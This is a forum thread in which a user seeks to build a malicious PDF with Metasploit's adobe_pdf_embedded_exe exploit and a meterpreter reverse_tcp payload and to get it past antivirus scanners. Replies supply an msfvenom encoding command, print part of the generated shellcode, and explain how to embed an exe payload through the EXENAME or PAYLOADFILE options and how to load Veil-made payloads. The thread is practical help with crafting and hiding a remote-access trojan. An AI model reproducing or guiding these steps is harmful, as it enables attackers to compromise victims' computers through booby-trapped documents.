Forum Thread: Create Encoded Payload for Pdf


I am trying to create a malicious pdf file using the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe" with the payload "windows/meterpreter/reverse_tcp".

But all the AVs detect it, so that's when I decided to try to encrypt it using msfvenom, but nothing I tried has worked. Is there a tutorial on Null Byte/anywhere on the web where it is described how one should encrypt payloads within the pdf exploit?

25 Responses

I believe it depends on the antivirus. By encrypt do you mean encode? If so which encoder are you trying to use and did you try changing the number of iterations? Sometimes an AV might detect a payload iterated 15 times but not detect one iterated 12 times for example.

Yeah sorry, I meant encode, and I'm just not sure how to encode, because when I encode using msfvenom: msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -b '/x00' -f ruby -o filename.rb I get only a file with "buf = a lot of chars" (see my other post here).

I am not sure what I should do with all these chars so yeah...

Did you check if the new encoded payload has appeared in the destination you specified? Maybe it creates the encoded payload and then gives that message which doesn't necessarily mean the encoding wasn't successful. Try searching for the file and let me know if you don't find it.

I have found it, no errors during generating, but the file only contains this:
buf =
"\xbd\xad\xc7\x72\xa4\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x96\x83\xc3\x04\x31\x6b\x0e\x03\xc6\xc9\x90\x51\xa2" +
"\x82\xb0\x2d\x77\xf1\xfa\x8b\x03\x22\x09\x73\xc2\xe3\x40" +
"\x0b\x97\x34\xa6\x25\xc7\xbb\xa4\x15\xbc\xc5\xe8\xeb\xe7" +
"\xb2\x79\x6a\x66\xe0\xbd\x80\x9d\xbd\x23\x45\x61\x2f\x31" +
"\xd9\xe2\x19\xae\xc8\x82\xf2\x72\xf9\xe8\xad\x2e\x9c\x4d" +
"\xe4\x0b\x1a\xff\xb9\x4e\xa6\xc0\x5b\xad\x2d\x9b\x6c\xf1" +
"\x7c\x73\x02\x48\x1d\xa3\x4b\xe5\x03\xc1\x4f\x3f\xfe\xc1" +
and a lot more

Oh I get it, well you can do what APEROCK said, however I believe that you might be getting somewhere on your own. As of now it seems like you've successfully encoded a payload, now when you use the pdf_embedded exploit you can specify that encoded payload (I think) so that the AV doesn't detect it.

That is the correct output for the command you entered. What are you expecting it to contain?

A payload. I have no clue what to do with this file.

You use it in combination with the pdf_embedded exploit so that the AV doesn't detect the pdf.

But the pdf_embedded is the exploit
EDIT:
Sorry, read it wrong

I'm sorry, it was a typo, the reply should be fixed now.

Given the exploit you are trying to use I would suggest using an executable format in msfvenom such as exe.

Also, simply encoding a payload will not bypass AV, 1 time or 100 times. Encoding a payload is used to remove bad characters that will break your shell code (long story short). The byproduct of this is that it used to alter the signature so AV wouldn't pick up on it. This is no longer true though.

Once you have created your payload in msfvenom (in exe format) then set PAYLOAD to generic/custom and then set PAYLOADFILE to the path where your payload (exe) is.

I got it working; I didn't look well enough at the option my exploit gave, which is EXENAME

Hallelujah :D Good job.

Good deal... Good luck...

^

The payload I created using veil is not being found by metasploit though I put it in ~/.msf4/modules/payloads/windows/meterpreter/

Any idea?

Are you sure you've put it in this folder? Once the encoding was complete, did you verify that the "Executable written to: " message was pointing to that exact directory?

I mean, according to the second link APEROCK posted in his comment, OTW talked about putting the generated payload (he talked about an exploit though) in the .msf4 modules folder

UPDATE: The payload you created might not be compatible with the exploit used, I'm not sure so I'll test everything out and I'll tell you exactly how to do it in an hour or so.

Thanks. But I didn't select an exploit yet, I just used the search function within msfconsole and it didn't find it.
